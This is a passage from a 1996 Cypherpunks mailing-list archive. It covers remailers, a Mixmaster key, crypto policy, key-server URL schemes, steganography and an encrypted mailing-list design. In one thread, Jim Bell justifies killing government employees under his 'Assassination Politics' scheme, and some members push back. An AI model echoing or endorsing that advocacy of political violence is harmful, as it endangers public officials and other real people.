years ago.)

Unix-based remailers, and the like, don't rely on secure hardware.

We've talked about possible hardware security measures, even those that
only rely on physical box security. A box that does decryption, mixing,
readdressing, etc., without being part of a Unix file system/network, could
be a useful "Mom and Pop remailer" (the idea being that small shop owners,
"Mom and Pop," could set this up, collect a little bit of spare change as a
remailing fee, and not even have access to the internal state of the
machine themselves.

At a Cypherpunks meeting a couple of years ago we spent some time
brainstorming this. It seemed plausible that a small outfit could make such
"remailer boxes" and sell them cheaply. (Hardware prices have plunged even
further.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 5 Mar 1996 08:48:14 +0800
To: cypherpunks@toad.com
Subject: Report on Privacy Enhancing
Message-ID: <199603042134.QAA02905@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Does anyone how to get a copy of the report on "privacy 
   enhancing technologies - the path to anonymity" cited in 
   this paper from the Canberra/OECD conference on Feb 7-8: 
 
      http://www.nla.gov.au/gii/oconnor.html 
 
   Issues Facing Government : Meeting Public Concerns 
 
   Kevin O'Connor 
   Privacy Commissioner, Australia 
 
   [Giant snip] 
 
      In my own sphere of activity, there is some discussion 
      taking place over the potential of new technologies and 
      applications to assist with privacy protection.  A 
      recent report from the Dutch and Ontario Privacy 
      Commissioners entitled Privacy enhancing technologies - 
      the path to anonymity, offers some intriguing 
      suggestions about the potential of public key 
      cryptography for use in digital signatures to act as 
      'identity protectors' - allowing transactions to be 
      completed and accounted for without the true identity of 
      the participants needing to be known. 
 
      While there are some obvious concerns about such 
      technologies from a law enforcement perspective, which 
      we have already heard about from the previous speaker, 
      these should not be insuperable obstacles.  On the other 
      hand, the registration of digital signatures and public 
      keys, with sufficient integrity to gain commercial and 
      governmental confidence, itself raises additional 
      privacy concerns.  The complex issues involved are only 
      just starting to be addressed. ... 
 
   ----- 
 
   Encouragingly, another paper by Matthew Bowcock 
 
      http://www.nla.gov.au/gii/bowcock.html 
 
   states: 
 
   [Big snip] 
 
      Controls on Encryption Technology 
 
      There has been much heated debate worldwide about 
      restrictions on the use of encryption technology, so 
      that law enforcement and national security agencies can 
      continue to intercept communications. Two questions are 
      worth asking in this debate. 
 
      Firstly, is interception of private communications a 
      governmental right, which must therefore be protected in 
      the face of technological change, or is it an accidental 
      consequence of the weaknesses of the communication 
      techniques that we have been using? I would argue that 
      it is the latter and that there is no community 
      obligation to protect it. 
 
      Secondly, is a country better served by a vibrant, 
      efficient, electronic economy, using trusted secure 
      communication techniques for its day to day business, or 
      by attempting to reduce organised crime by restricting 
      use of technology? So far, much of the opposition to 
      restrictions on the use of encryption technology has 
      centred around a right to privacy and civil libertarian 
      issues. Perhaps, instead, we need to quantify the 
      opportunity cost, in economic terms, of delayed and 
      lower levels of adoption of electronic commerce by the 
      business community because the security mechanisms are 
      not sufficiently trustworthy. It may be that the cost to 
      the economy of restricting the use of encryption 
      technology outweighs the benefits to the community. ... 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Tue, 5 Mar 1996 11:09:30 +0800
To: cypherpunks@toad.com
Subject: new mixmaster remailer
Message-ID: <199603042243.QAA09874@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I've set up a mixmaster remailer at nsa@omaha.com. 

Here's the key:

=-=-=-=-=-=-=-=-=-=-=-=
omaha nsa@omaha.com c20bfad8d66b43448ca3bdcfa794e244 2.0b11

-----Begin Mix Key-----
c20bfad8d66b43448ca3bdcfa794e244
258
AATNlQZx/gSC34PBLJNNmrBzo3m8CE6/kvCTscQ7
ciuhKGUM7vPGtiAXQiueFyDSUqh24L5dWaX2CWrm
+Z0dsmJTYSulrrtS6/kFO1Qnl5TPrPcWl+BgBT4M
mBWQKip4rw+hn8gfXyS+b7gd0JqW/ajlKGAchGxw
NsuDVbpEL3ncVwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 5 Mar 1996 09:21:24 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Bombings, Surveillance, and Free Societies
Message-ID: <v02120d07ad61171e6fa0@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


[This post is 100% free of remarks defending actions of the state of Israel.]

At 12:51 PM 3/4/96, Timothy C. May wrote:

>Personally, while I feel sorry for the dead in Israel, I think anyone who
>moves to a small desert state surrounded on all sides by Arabs who want
 ^^^^^^^^
>their land back is asking for trouble.

        Like someone who crosses the road without looking both ways is
asking for trouble? O necessity, we worship at your altar.
        Some folks--in fact, most Israelis--were born in Israel.
        The rest of your remarks about "a...state surrounded on all sides
by Arabs who want their land back" doesn't exactly describe the
Palestinians' relations with denizens of neighboring territories prior to
the rise of Zionism, or even since, for that matter.
        </thread>

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@warwick.com>
Date: Wed, 6 Mar 1996 07:52:48 +0800
To: <cypherpunks@warwick.com>
Subject: Returned mail: User unknown
Message-ID: <199603050129.RAA06211@waterville.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Mon, 4 Mar 1996 17:28:57 -0800
from cmyk.warwick.com [198.102.205.163]

   ----- The following addresses had delivery problems -----
<majorodomo@toad.com>  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to toad.com.:
>>> RCPT To:<majorodomo@toad.com>
<<< 550 <majorodomo@toad.com>... User unknown
550 <majorodomo@toad.com>... User unknown

   ----- Original message follows -----


To: majordomo@toad.com
Subject: unsubscribe cypherpunks
From: cypherpunks@warwick.com
Date: Tue, 5 Mar 1996 15:11:06 -0500

unsubscribe cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Mar 1996 20:00:19 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Assassination Politics 9!
Message-ID: <m0ttm57-0008zeC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:04 PM 3/4/96 -0500, John Young wrote:

>The Economist terrorism report is unusally thoughtful and open-minded,

As opposed to the drivel you normally see in the media?

>and
>considers the benefits of savaging innocents from the perspectives of a
>variety of deeply held beliefs. 

Which "innocents"?  And which "deeply held beliefs"?  I've never advocated 
"savaging innocents."  But I don't consider people who benefit from 
government theft AND actively participate in that theft by being employed by 
that government as "innocents."

 >But after revewing the plenitude of those who have murdered

I notice you used the term, "murdered."  Well, by the strict definition of 
the term, that's merely premeditated killing which is against the law.  In a 
country suitably dictatorial government, defending oneself from agression by 
its agents is, then, "murder."

Sorry, but I don't subscribe to the agressor's (government's) opinion of 
what I may do to him if I were given the opportunity.

> for
>understandable motives, it does point to a very small group who truly lack
>any rationale for earthly comprehension. 

Read:  "It selectively focuses on a few, wrong people, and ignores the rest 
who are justified."

Did I get it?

>Not that I want to get on your "Shit, shoot that fucker" list, but take a
>look at it to double-check that you're not skydiving into the wrong
>maelstrom. It's pretty long, but I'll gladly scan it and send it along. 

Well, go right ahead.  The Economist is better than most, but I seriously 
doubt that there is going to be anything there that changes my mind.  Maybe 
I ought to email my essay to the author, to see what he thinks of it...


>If not that, read Tim's pithy warning today about shit-stormtroopers
>provoked by the daredeviltry of extreme-unctuous freedom fighters. 

It's hard to provoke a person who is already dead.  If my system were 
operational, those "stormtroopers" wouldn't dare go to work in the morning.  
Or can't you see that?

If we dictate all of our actions based on the fear of what THEY will do, 
then THEY have already won, and we have already lost.

Jim Bell








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 6 Mar 1996 19:52:37 +0800
To: mike@fionn.lbl.gov
Subject: Re: NYT on Crypto Bills
Message-ID: <199603050229.SAA01572@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 4,  3:09pm, Adam Shostack wrote:
>     Markoff shouyld know better than this.  There is a long
> history of business use of codes & ciphers, going back hundereds of
> years, and durring the heyday of the telegraph, there were fair size
> companies that created codebooks with (locally configurable)
> superencipherment systems for the market.

Michael Helm writes:
> I thought that, for the most part, the telegraph systems described
> above were to reduce cable charges (1 code word instead of a 15-word
> sentence, a huge savings in those days).

At  8:00 PM 3/4/96 -0500, Perry E. Metzger wrote:
>Totally untrue. The use of encryption for business purposes goes back
>centuries, and there were commercial providers of blank telegraph code
>books all through the 19th century. The use of crptography to protect
>communications only declined with the end of telegrams and the
>reduction in the perception that large numbers of strangers would be
>handling your missives. See "The Codebreakers" for a history of this.

"The Codebreakers" describes (Footnote p516) that in 1939 the Allies
prohibited the use of any codes, but business pressure made them relent and
allow a fixed set of published commercial codes.  On page 842, "The code
compilers strove constantly to find new ways of reducing cable tolls for
users -- this was, after all, their raison d'etre. ..."  It also mentions
(p839) a class of commercial code, mostly numeric, which lent themselves
easily to superencipherment, which seemed to aim quite as much at secrecy
as at economy.  It also mentions that (p850) after WW2 the rising cost of
labor (compared with communication) delt codes a mortal blow.

It seems that both uses were important, with different emphasis for
different users.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 5 Mar 1996 19:39:13 +0800
To: cypherpunks@toad.com
Subject: re: NYT on crypto
Message-ID: <960304183355.20202bb5@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>I thought that, for the most part, the telegraph systems described
>above were to reduce cable charges (1 code word instead of a 15-word
>sentence, a huge savings in those days).  

Was one use however I seem to recall citations dating back to Niccolo Polo
reguarding the use of trade codes & that was a while before the telegraph.
If I were really curious, would also check out Reuters, Lloyds, Rothchilds,
and the Borgias. Would not be surprised to find a reference in either/all
"The Prince", "The Art of War",  and the letters of Nathan Hale.

However I suspect that Markoff really meant to be referring to mathematical
algoritms such as the LOASDR. I suppose that only dates back to the
diameters of stygi (sp ?) about the same time that passwords were first 
recorded (and changed daily).
						Warmly,
							Padgett

ps if anyone has a spare LOASDR or CMSDR, I would be interested 8*).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 5 Mar 1996 19:46:51 +0800
To: mike@fionn.lbl.gov
Subject: Re: NYT on Crypto Bills
In-Reply-To: <199603041810.KAA07446@fionn.lbl.gov>
Message-ID: <199603042349.SAA04471@homeport.org>
MIME-Version: 1.0
Content-Type: text


Michael Helm wrote:

| On Mar 4,  3:09pm, Adam Shostack wrote:
| > 	Markoff shouyld know better than this.  There is a long
| > history of business use of codes & ciphers, going back hundereds of
| > years, and durring the heyday of the telegraph, there were fair size
| > companies that created codebooks with (locally configurable)
| > superencipherment systems for the market.
| 
| I thought that, for the most part, the telegraph systems described
| above were to reduce cable charges (1 code word instead of a 15-word
| sentence, a huge savings in those days).  Maybe it's the use to which
| the encoding's put that's controversial, not the (idea of) encoding
| itself.

	This is true, the codes were designed to minimize telegraph
charges.  However, many of them also contained systems (of varying
quality) for protecting the privacy of communications.

	For example, one might buy a book without page numbers, and be
encouraged to arbitrarily number the pages.  A code entry would then be page
indicator and position on the page.  Not diplomatic quality, but
considering the poor state of commercial cryptanalysis at the time,
fairly effective at protecting business secrets.

	My copy of Kahn is on loan, so I might be misremembering
things.

	Speaking of old crypto, I haven't heard anything on where to
find a Jefferson wheel cipher.  Does no one know?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 5 Mar 1996 19:48:46 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199603011603.IAA16596@slack.lne.com>
Message-ID: <199603050003.TAA04555@homeport.org>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
| > 	key://foo.bar.com/{u,s,h,d}/family/instance
| While that would be useful in a lot of cases, I would hope that
| all that path gunk wouldn't be required.... most people would
| have one key, at least initially, and so a simple
| 
| key://foo.bar.com/username/key.asc
|
| would be enough for them.  I wouldn't want to prevent people
| from using your system, in fact it's a good idea.  I just don't think
| that it should be required, just recommended.
| Something else to add would be a specifier for the type of key, i.e.
| 
| key://slack.lne.com/pgp/ericm/key.asc

I'd either move that later in the structure, or leave it out.  Moving
it later in the structure so we don't need duplicate heirarchies.
Leaving it out may be ok because we can define a standard location by
key type: 

key://slack.lne.com/~ericm/key.asc
key://slack.lne.com/~ericm/key.x509

key://slack.lne.com/~ericm/x509/key.cert
key://slack.lne.com/~ericm/pgp/key.asc

I have no objection to defining a shorter URL, but would want some
indicator that we're in user space, not host/domain/realm space.  A
~username serves that purpose as well as /u/ and is a more common
usage.

My last comment is that if we define a URN scheme for keys, we should
force a dependable structure on it, so that its predictable where to
find a users PGP key from an email address, without having to check 6
locations.  Nothing is there now, we should require order to make
everyones life easier.

| Finally, a question:  should the keyserver be able to serve
| keys in a way that is secure from a MITM attack, or can it depend
| on the certificate chain in the key certificate itself to
| validate the key certificate?  I think it can, but I am not
| sure, so perhaps someone smarter than I can explain why, or why not.
|
| The attraction is obvious, if the key server doesn't have to
| validate the keys it serves, the whole problem of distributed
| key servers becomes much easier.

	A key server should serve keys because protecting from MITM is
hard.  Serving keys is easy, so we should solve that problem today,
and the other problems as we can.  Some infrastructure is better than
none.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 5 Mar 1996 19:39:55 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Assassination Politics 9!
Message-ID: <199603050004.TAA28837@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 04, 1996 14:45:02, 'jim bell <jimbell@pacifier.com>' wrote: 
 
 
Mr. Bell, 
 
 
The Economist terrorism report is unusally thoughtful and open-minded, and
considers the benefits of savaging innocents from the perspectives of a
variety of deeply held beliefs. 
 
 
But after revewing the plenitude of those who have murdered for
understandable motives, it does point to a very small group who truly lack
any rationale for earthly comprehension. 
 
 
Not that I want to get on your "Shit, shoot that fucker" list, but take a
look at it to double-check that you're not skydiving into the wrong
maelstrom. It's pretty long, but I'll gladly scan it and send it along. 
 
 
If not that, read Tim's pithy warning today about shit-stormtroopers
provoked by the daredeviltry of extreme-unctuous freedom fighters. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 5 Mar 1996 19:47:46 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics 9!
Message-ID: <v02120d02ad613756209f@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:45 PM 3/4/96, babybell@pacifier wrote:

>Most traditional "terrorism" (as least "traditional," by the standards of
>the last 20 years) is thought to involve relatively unfocussed attacks
>against people and locations, but in situations where attacks against
>selected government officials would be far more selective and effective.
<...>
>Since I propose exactly that kind of replacement, I am presumably not the
>most ingratiating figure to these people.

        Now I understand why you seemed to be "not the most ingratiating
figure"--you must've nominated me for assassination.


                         oooo$$$$$$$$$$oooo
                      oo$$$$$$$$$$$$$$$$$$$$$$o
                   oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$o         o$   $$ o$
   o $ oo        o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o       $$ $$ $$o$
oo $ $ "$      o$$$$$$$$$    $$$$$$$$$$$    $$$$$$$$$o       $$$o$$o$
"$$$$$$o$     o$$$$$$$$$  **  $$$$$$$$$  **  $$$$$$$$$$o    $$$$$$$$
  $$$$$$$    $$$$$$$$$$$      $$$$$$$$$      $$$$$$$$$$$$$$$$$$$$$$$
  $$$$$$$$$$$$$$$$$$$$$$$    $$$$$$$$$$$    $$$$$$$$$$$$$$  """$$$
   "$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     "$$$
    o$$   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$      $$$o
   $$$    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$$oooo$$$$o
  o$$$oooo$$$$$  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$   o$$$$$$$$$$$$$$$$
  $$$$$$$$"$$$$   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     $$$$""""""""
  """"      $$$$    "$$$$$$$$$$$$$$$$$$$$$$$$$$"      o$$$
            "$$$o     """$$$$$$$$$$$$$$$$"$$"         $$$
              $$$o          "$$""$$$$""""           o$$$
               $$$$o                oo            o$$$"
                "$$$$o     o$$$$$$o"$$$$o       o$$$$
                  "$$$$$oo    ""$$$$o$$$$$o  o$$$$""
                     ""$$$$oooo  "$$$o$$$$$ $$$"""
                        ""$$$$$$oo $$$$$$$$$
                                """$$$$$$$$$$
                                    $$$$$$$$$
                                      $$$$$






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 5 Mar 1996 12:10:10 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <ad6102ba0102100403ed@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 PM 03/04/96, Jim Miller wrote:
>The recent discussion "Chaff in the Channel" got me thinking about an
>alternative to hiding random bit streams in picture files.  The goal of
>steganography, as I see it, is to provide plausible deniability.  The
>problem with hiding bit streams is that you can never be sure if the
>opponent has developed an analysis technique to prove a particular file
>contains a suspicious bit pattern.

The way I understand steganography working, you would use it to hide
mathematically random data.  Mainly encrypted data.  Like a PGP encrypted
message, but with all PGP headers and other non-random data removed.
Photos are a great medium for steganography, since they already contain
noise of various sorts.  So a good steganography algorithm (which I
understand exists) merely changes the values of the noise so that it now
encodes your (random) message.  So there's no way to look for "suspicious
bit patterns", and even if you use a publically available stego program to
encode your data, and they use the same program to unstego your data, all
they wind up with is a random bit stream, and they have no way of telling
if it's just noise in the picture or your PGP encrypted message.   So you
already have all the plausible deniability you need, and I don't see how
Jim's method is an improvement.

Of course, if they have methods to crack PGP encrypted messages, and they
use it on yours even without being sure it is an encyrypted message, and
eventually wind up with a clear text message, well, then they've got your
clear text message.  And you are unlikely to be able to claim that it's
just a coincidence they managed to extract several paragraphs about
laundering money in bermuda from the GIF or orca the killer whale.  But
this is true of any stego method--if they can manage to get a cleartext
message out of it, plausible deniability is unlikely to get you far.

Am I wrong about any of the above?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 6 Mar 1996 22:08:20 +0800
To: tcmay@got.net
Subject: Re: FUD about Remailers--the Strassman/Marlow "Revelations"
In-Reply-To: <ad5fbfab020210044ba1@[205.199.118.202]>
Message-ID: <vt8Ox8m9LsiC085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ad5fbfab020210044ba1@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> Oh really? And just which remailers are in France and Germany? (Raph's list
> doesn't show any ".de" or ".fr" sites, at least that I could see. It's
> possible that a site or two exists in France or Germany, but I'm skeptical.
> And certainly the "the most popular remailers in France and Germany" is an
> odd comment.)

Actually, Tim, Raph's list includes the "ford" remailer
<remailer@bi-node.zerberus.de>.  Nothing in France, though.

I agree that Mr. Anonymous's report is FUD.  

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTvN5uVevBgtmhnpAQE+OwL/Qn0Fp7/XyrWfsaXSbbYRHNNRCN6pmWNO
NfAdvuBbJ5QK+35ozAY8D6xMIEe0bJzECfcl2YflIBIOTHL19IIX6S3Llkh6Br8R
ybXBxZM+0tr05y2HHSE4IqbEGOisc1/8
=foPg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 5 Mar 1996 13:21:50 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <203602070728.XAA19559@slack.lne.com>
Message-ID: <199603050218.VAA05146@homeport.org>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
| Adam Shostack writes:
| > 
| > Leaving it out may be ok because we can define a standard location by
| > key type: 
| > 
| > key://slack.lne.com/~ericm/key.asc
| > key://slack.lne.com/~ericm/key.x509
| > 
| > key://slack.lne.com/~ericm/x509/key.cert
| > key://slack.lne.com/~ericm/pgp/key.asc
| > 
| > I have no objection to defining a shorter URL, but would want some
| > indicator that we're in user space, not host/domain/realm space.  A
| > ~username serves that purpose as well as /u/ and is a more common
| > usage.
| 
| Ok.  Sounds good, for user-maintained keys like PGP anyhow.
| More hierarchical keys, like X.509, could be maintained
| by a CA that also maintains the server... some people who
| could use encryption don't know, and don't want to know, enough
| about it to even be willing to hold their own certificates.  They
| want it to "just work".  I think that this scheme should be flexable
| enough to be able to support a CA maintaining user's certificates
| for them.  Note that this doesn't mean that the CA/key server
| would know the keys, i.e. this should not support GAK*.

	Having keys placed in a namespace defiend by a user does not
mean the user needs to make the key available, only that the key can
be found there.

	Nothing says we can't have key://keys.verisign.com/~ericm if
they issue keys in some space that maps into user names.

| > My last comment is that if we define a URN scheme for keys, we should
| > force a dependable structure on it, so that its predictable where to
| > find a users PGP key from an email address, without having to check 6
| > locations.  Nothing is there now, we should require order to make
| > everyones life easier.
| 
| Along those lines, I was envisioning adding a KEY RR type to
| DNS, and using it to maintain pointers to keyservers.

[...]
| This sounds so obvious that I'm sure that I'm not the first
| or even the tenth person to think of it, and in fact I
| see a KEY RR type defined in the BIND 4.9.3BETA17 source.  But
| there's just a type there, nothing else to support it.
| Anyone know what it's for?

	Donald Eastlake is writing the spec for storing keys in
nameservers.  Its in the process of moving to draft standard; there
will probably be something about it after LA.  I think its:

ftp://ds.internic.net/draft-ietf-dnssec-secext-09.txt


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 6 Mar 1996 22:12:41 +0800
To: jpp@software.net
Subject: Re: Looking for code to run an encrypted mailing list
In-Reply-To: <2.2.32.19960304053309.00bd5ec8@mail.software.net>
Message-ID: <3/8Ox8m9L0/D085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <2.2.32.19960304053309.00bd5ec8@mail.software.net>,
John Pettitt <jpp@software.net> wrote:

> I'd like to run an encrypted mailing list  - the model I'm linking of is this ..
> 
> Poster cryptes mail with pgp using list exploder key. List exploder decrypts
> mail and recrypts with keys for all current list members and then sends the
> mail.
> 
> [I don't want all the list members to need to know every other list members
> public key]

Is this the right way to go about doing this?

If the mailing list has N members, then, for each message posted to the
list, the list processor must decrypt the message and then reencrypt it
N times.  If it is using PGP, that means:

(1) decrypting the incoming message's IDEA session key with the list
processor's RSA private key;

(2) decrypting the incoming message using the IDEA session key;

foreach $listmember (@mailinglist)
{
(3) generate an IDEA session key for message to listmember;

(4) encrypt the message with that IDEA session key;

(5) encrypt the session key with listmember's RSA public key;

(6) send the encrypted message and encrypted IDEA session key to listmember;
}

PGP does each encryption seamlessly . . . but in a large list, that's 
a lot of encryptions to do.  

It seem's to me that it would be more efficient simply to:

(1) decrypt the incoming message's IDEA session key using the list
processor's RSA private key;

foreach $listmember (@mailinglist)
{
(2) encrypt that same IDEA session key with listmember's RSA public key;

(3) send listmember the encrypted message and the encrypted IDEA session
key;
}

This saves one IDEA decryption and N IDEA encryptions of the message. 
It also saves the need to generate N random session keys, demanding 128N
bits of randomness from randseed.bin .

It means, however, that the list processing software couldn't use PGP, but
has to implement RSA public-key cryptography independently and
compatibly with PGP, so that listmembers could use PGP to encrypt and
decrypt list messages.

(That is, unless the API for PGP 3.0 will be sufficiently robust to
allow fancy session key management like this.)

According to Schneier, RSA is about 100 times slower than IDEA. (He says
it's 100 times slower than DES in software, and DES are about the same
speed.) The faster method still requires N RSA encryptions of the
128-byte session key.  Processing time is cut in half for a message of 
about 13kbytes' length; longer messages save more, shorter ones less.

And it occurs to me that, since RSA encryptions are commutative, the
list processor could encrypt the session key with the recipient's public
key *before* it decrypted it with its private key, so that the session
key is never available in cleartext to the list processor operator.

(Do pseudopunks write pseudocode? ;-) )

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTvdZuVevBgtmhnpAQEEowMAuo9Z3t8lmE9SH0pSoTXeIIxjwqG/uWWQ
kSgichHXmun8X+q+wjRu7iGTaDF1WabvOXUIPOftjZgo7xN5MN5awbEgGmrCidXd
ClUQWX/qvH0h+IxcoSURsJOX8MFLMRlP
=0Cwo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Wed, 6 Mar 1996 22:06:36 +0800
To: cypherpunks@toad.com
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <199601280027.BAA07662@utopia.hacktic.nl>
Message-ID: <v03005102ad61925e3ec8@[157.22.240.12]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 PM 1/27/96, Anonymous wrote:
>Anybody have info on the SEAL cipher?  I can't find any
>descriptions or analysis of it.  Refs, proceedings or URLS
>would be a good thing.

I also am interested in references to it.

I'm told that it was invented by a cryptographer at IBM, and that it
patented, so that should help in the search.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 5 Mar 1996 16:31:20 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Looking for code to run an encrypted mailing list
Message-ID: <2.2.32.19960305071708.00b98a10@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



I wrote :
>> 
>> Poster crypts mail with pgp using list exploder key. List exploder decrypts
>> mail and recrypts with keys for all current list members and then sends the
>> mail.
>> 
>> [I don't want all the list members to need to know every other list members
>> public key]
>

At 09:24 PM 3/4/96 -0800, Alan Bostick replied:
>Is this the right way to go about doing this?
>
>If the mailing list has N members, then, for each message posted to the
>list, the list processor must decrypt the message and then reencrypt it
>N times.  
>

Hmm thats not what I meant - I just envisioned giving all the recipient
public keys to pgp and saying letting it do the rest.  This does result in
all recipients gettingthe key fingerprints of all other recipients which is
not a problem in my application.

Alan goes on to suggest sumthing very similar except that he does not
decrypt the body first - which apart from meaning I'd have to hack pgp
acheives the same effect.

The overal intent was to have a message go from one list member to all
others with a) a signature to provide strong attribution and a measure of
non repudiation b) low probability of interception c) only the gateway has
to have all the public keys.  

Inbound the process looks like this:
        decrypt and validate signature (leaving original signature)
        add gateway info (sender signature validation, date received etc)
        sign the whole thing with the gateway key.
        crypt with all list member keys (i.e. one message readable by any
member)
        send to members.

Several people have pointed me at PGPdomo which I now have a copy of and
will be looking at as a basic for this (assuming it's not an exact fit
already).\

[thanks to all those who responded]

John
--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk>
Date: Tue, 5 Mar 1996 19:48:56 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie-Hellman for Matchmaking?
Message-ID: <199603042327.XAA19170@carol.cs.rhbnc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ok, I am reposting this, with more detail this time. Hope this
answers the two questions I received.

I want to design/find some matchmaking protocols. I define matchmaking
as follows:
Bob must find out whether Alice has declared (commited) her interest
in him, if and only if he has declared (commited) his interest in her.
Before he does so, he can at most know that a girl is interested in him.
